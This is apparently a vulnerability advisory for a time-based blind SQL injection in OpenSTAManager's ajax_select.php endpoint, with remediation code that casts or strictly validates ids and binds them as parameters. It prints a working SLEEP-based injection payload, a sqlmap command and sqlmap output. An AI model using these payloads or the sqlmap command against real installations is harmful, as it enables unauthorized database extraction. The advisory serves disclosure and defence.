PT-2026-6867 · Packagist · Devcode-It/Openstamanager
Published 2026-02-06 · Updated 2026-02-06
CVSS v3.1: 8.8 (High)
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
Summary
A SQL injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject SQL through the options[matricola] parameter.
Proof of Concept
Vulnerable Code
File: modules/impianti/ajax/select.php, lines 122-124

```php
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }
```
Data Flow
- Source: $_GET['options']['matricola'] → $superselect['matricola']
- Vulnerable: user input is concatenated directly into the IN() clause without sanitization
- Sink: query executed via the AJAX framework
Exploit
Manual PoC (time-based blind SQLi):

```http
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
```

SQLMap exploitation:

```shell
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3
```

SQLMap output:

```text
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
```
Impact
- Data Exfiltration: Time-based blind SQL Injection allows complete database extraction
- Authentication Bypass: Access to sensitive component and equipment data
- Data Manipulation: Potential unauthorized modification of records
Remediation
Cast the values to integers before using them in SQL:

Before:

```php
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    // user-controlled string interpolated directly into the query
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}
```

After:

```php
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    // split the comma-separated list and force every element to an integer
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}
```
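The intval() cast above is sufficient to stop injection, but it silently turns any non-numeric token into 0, so a tampered request still produces a query rather than an error. The following is an added example, not OpenSTAManager code: it rejects the whole list if any token is not a plain positive integer, de-duplicates the ids, and emits the IN clause with positional placeholders so the values are bound rather than interpolated. The table and column names, the hypothetical $pdo handle and the sample inputs are assumptions for the demonstration.

```php
<?php
// Added example (not project code): strict parsing of a comma-separated id list
// such as options[matricola], plus a parameterized IN (...) clause builder.

/**
 * Parse a comma-separated list of row ids.
 * Returns the ids as ints, or null if any token is not a positive decimal
 * integer, so the caller can refuse the request instead of coercing junk to 0.
 */
function parseIdList(string $raw): ?array
{
    $ids = [];
    foreach (explode(',', $raw) as $token) {
        $token = trim($token);
        if ($token === '') {
            continue;                      // tolerate trailing or doubled commas
        }
        if (!preg_match('/^[1-9][0-9]{0,17}$/', $token)) {
            return null;                   // anything else is rejected, not cast
        }
        $ids[] = (int) $token;
    }
    return array_values(array_unique($ids));
}

/**
 * Build "`table`.`column` IN (?,?,...)" and the matching parameter list.
 * Table and column are fixed by the caller and never come from the request.
 */
function buildInClause(string $table, string $column, array $ids): array
{
    if ($ids === []) {
        return ['0', []];                  // empty selection: match nothing, never emit "IN ()"
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return ['`' . $table . '`.`' . $column . '` IN (' . $placeholders . ')', $ids];
}

// --- Demonstration on constructed inputs (assumed, not from real traffic) ----
$inputs = [
    '3,7,7, 12',                                            // ordinary request
    '1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1',   // the advisory's PoC string
    '0,5',                                                  // 0 is never a valid row id
    '',                                                     // nothing selected
];

foreach ($inputs as $raw) {
    $ids = parseIdList($raw);
    if ($ids === null) {
        // The legitimate UI never sends a non-numeric list, so a rejection here
        // is worth logging as a tampering indicator rather than silently fixing up.
        echo 'REJECTED: ' . json_encode($raw) . PHP_EOL;
        continue;
    }
    [$clause, $params] = buildInClause('my_componenti', 'id_impianto', $ids);
    echo "clause: $clause  params: " . json_encode($params) . PHP_EOL;
    // With a PDO handle (assumed $pdo) the ids travel as bound parameters:
    // $stmt = $pdo->prepare("SELECT * FROM `my_componenti` WHERE $clause");
    // $stmt->execute($params);
}
```

Run with `php example.php`: the first input yields `IN (?,?,?)` with params `[3,7,12]`, the PoC string and the list containing 0 are rejected outright, and the empty list produces the always-false condition `0` instead of a syntax error.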
Credit
Discovered by: Łukasz Rybak
Fix
SQL injection
Affected Products
Devcode-It/Openstamanager